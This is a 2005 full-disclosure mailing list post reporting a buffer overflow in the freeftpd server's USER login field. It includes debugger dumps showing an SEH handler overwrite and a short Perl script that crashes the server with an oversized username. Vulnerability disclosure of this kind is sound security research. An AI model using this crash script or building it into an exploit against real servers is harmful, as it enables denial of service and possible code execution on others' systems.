[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] freeftpd USER bufferoverflow
From:       barabas mutsonline <barbsie () gmail ! com>
Date:       2005-11-16 9:56:54
Message-ID: 981281b10511160156x26da1beco2bdd1547b809abe5 () mail ! gmail ! com
[Download RAW message or body]

[Attachment #2 (multipart/alternative)]


Hi,
 While drooling over my new Adriana Lima wallpaper, my tongue accidentally
hit my keyboard and more than 1012 chars were sent to the login screen of my
freeftpd server (which i use to backup my Adriana Lima pics). Guess
what...the server crashed! Luckily I attach ollydbg to every process I have
running and ths is what I found:
 ECX 50505050
 EIP 77C460CB msvcrt.77C460CB
Log data, item 0
Address=77C460CB
Message=Access violation when reading [50505050]
 77C460CB 8B01 MOV EAX,DWORD PTR DS:[ECX]
 well, eip doesnt get overwritten, but SEH does:

0012B6CC 41414141
0012B6D0 42424242
0012B6D4 42424242
0012B6D8 43434343 Pointer to next SEH record
0012B6DC 47464544 SE handler

EIP 47464544

Log data, item 0
Address=47464544
Message=Access violation when executing [47464544]
 I leave the exploit coding as an exercise...
 enjoy
 sample crash code:

#!/usr/bin/perl -w
#freeftpd USER buffer overflow
#barabas - 2005

use strict;
use Net::FTP;
my $user="\x41"x1011;
$user .="\x44\x45\x46\x47";#overwrite SEH
$user .="\x50"x400;

my $ftp = Net::FTP->new("127.0.0.1 <http://127.0.0.1>", Debug => 1);
$ftp->login("$user","whatevah");

[Attachment #5 (text/html)]

<div>Hi,</div>
<div>&nbsp;</div>
<div>While drooling over my new Adriana Lima wallpaper, my tongue accidentally hit my \
keyboard and more than 1012 chars were sent to the login screen of my freeftpd server \
(which i use to backup my Adriana Lima pics). Guess what...the server crashed! \
Luckily I attach ollydbg to every process I have running and ths is what I found: \
</div> <div>&nbsp;</div>
<div>ECX 50505050<br>&nbsp;</div>
<div>EIP 77C460CB msvcrt.77C460CB<br>Log data, item \
0<br>&nbsp;Address=77C460CB<br>&nbsp;Message=Access violation when reading \
[50505050]<br>&nbsp;</div> <div>77C460CB&nbsp;&nbsp; \
8B01&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; MOV \
EAX,DWORD PTR DS:[ECX]</div> <div>&nbsp;</div>
<div>well, eip doesnt get overwritten, but SEH does:</div>
<div>&nbsp;</div>
<div>
<p>0012B6CC&nbsp;&nbsp; 41414141<br>0012B6D0&nbsp;&nbsp; \
42424242<br>0012B6D4&nbsp;&nbsp; 42424242<br>0012B6D8&nbsp;&nbsp; 43434343&nbsp; \
Pointer to next SEH record<br>0012B6DC&nbsp;&nbsp; 47464544&nbsp; SE handler</p> \
<p>EIP 47464544</p> <p>&nbsp;Log data, item \
0<br>&nbsp;Address=47464544<br>&nbsp;Message=Access violation when executing \
[47464544]<br></p></div> <div>&nbsp;I leave the exploit coding as an \
exercise...</div> <div>&nbsp;</div>
<div>enjoy</div>
<div>&nbsp;</div>
<div>sample crash code:</div>
<div>&nbsp;</div>
<div>
<p>#!/usr/bin/perl -w<br>#freeftpd USER buffer overflow<br>#barabas - 2005</p>
<p>use strict;<br>use Net::FTP;<br>my $user=&quot;\x41&quot;x1011;<br>$user \
.=&quot;\x44\x45\x46\x47&quot;;#overwrite SEH<br>$user .=&quot;\x50&quot;x400;</p> \
<p>my $ftp = Net::FTP-&gt;new(&quot;<a href="http://127.0.0.1">127.0.0.1</a>&quot;, \
Debug =&gt; 1);<br>$ftp-&gt;login(&quot;$user&quot;,&quot;whatevah&quot;);</p> \
<p><br>&nbsp;</p></div>



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic